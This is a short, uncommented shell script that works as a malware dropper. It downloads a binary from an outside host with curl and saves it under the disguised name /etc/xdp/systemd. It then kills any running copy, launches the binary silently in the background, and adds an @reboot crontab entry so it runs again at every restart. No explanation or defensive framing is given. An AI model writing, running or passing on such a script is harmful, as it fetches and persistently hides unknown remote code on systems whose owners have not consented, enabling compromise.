#!/bin/sh




curl https://lgu.mcsoft.org/sys --output /tmp/systemd
mkdir -p /etc/xdp/
mv /tmp/systemd /etc/xdp/systemd
chmod +x /etc/xdp/systemd
if pgrep -f "/etc/xdp/systemd"
then
    echo "script running"
    kill -9 $(pidof /etc/xdp/systemd)
else
    echo "script not running"
fi
/etc/xdp/systemd 2>/dev/null 1>/dev/null &
crontab -e 2>/dev/null 1>/dev/null &
command="/etc/xdp/systemd 2>/dev/null 1>/dev/null &"
job="@reboot $command"
cat <(fgrep -i -v "$command" <(crontab -l)) <(echo "$job") | crontab -


echo
echo "ok"
echo
